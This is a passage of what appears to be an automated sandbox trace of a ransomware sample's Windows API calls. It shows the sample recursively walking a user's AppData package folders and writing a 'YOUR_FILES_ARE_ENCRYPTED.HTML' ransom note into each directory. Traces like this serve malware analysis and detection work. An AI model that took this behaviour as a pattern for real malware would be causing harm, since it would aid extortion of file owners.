RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.072] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.074] CloseHandle (hObject=0x32c) returned 1 [0115.074] GetProcessHeap () returned 0x600000 [0115.074] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.074] GetProcessHeap () returned 0x600000 [0115.074] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.075] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.075] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.075] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory") returned 99 [0115.075] GetProcessHeap () returned 0x600000 [0115.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.076] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory" [0115.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.077] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0115.077] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 0 [0115.077] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.077] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.077] GetProcessHeap () returned 0x600000 [0115.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.078] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.080] CloseHandle (hObject=0x32c) returned 1 [0115.080] GetProcessHeap () returned 0x600000 [0115.080] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.080] GetProcessHeap () returned 0x600000 [0115.080] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.081] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.081] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.081] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp") returned 92 [0115.081] GetProcessHeap () returned 0x600000 [0115.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.083] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp" [0115.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.083] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0115.083] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 0 [0115.084] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.084] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.084] GetProcessHeap () returned 0x600000 [0115.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.085] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.086] CloseHandle (hObject=0x32c) returned 1 [0115.086] GetProcessHeap () returned 0x600000 [0115.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.087] GetProcessHeap () returned 0x600000 [0115.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.088] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.088] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.088] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0115.088] GetProcessHeap () returned 0x600000 [0115.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.089] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.090] CloseHandle (hObject=0x324) returned 1 [0115.090] GetProcessHeap () returned 0x600000 [0115.090] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.090] GetProcessHeap () returned 0x600000 [0115.090] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.091] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.091] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.091] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData") returned 92 [0115.091] GetProcessHeap () returned 0x600000 [0115.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.092] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData" [0115.092] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData\\*" [0115.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.093] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.093] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.093] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.093] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.093] GetProcessHeap () returned 0x600000 [0115.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.094] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.096] CloseHandle (hObject=0x324) returned 1 [0115.096] GetProcessHeap () returned 0x600000 [0115.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.096] GetProcessHeap () returned 0x600000 [0115.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.096] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.097] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.097] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache") returned 95 [0115.097] GetProcessHeap () returned 0x600000 [0115.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.098] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache" [0115.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache\\*" [0115.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.099] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.099] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.099] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.099] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.099] GetProcessHeap () returned 0x600000 [0115.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.100] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.102] CloseHandle (hObject=0x324) returned 1 [0115.102] GetProcessHeap () returned 0x600000 [0115.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.102] GetProcessHeap () returned 0x600000 [0115.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.103] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.103] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.103] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState") returned 95 [0115.103] GetProcessHeap () returned 0x600000 [0115.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.104] 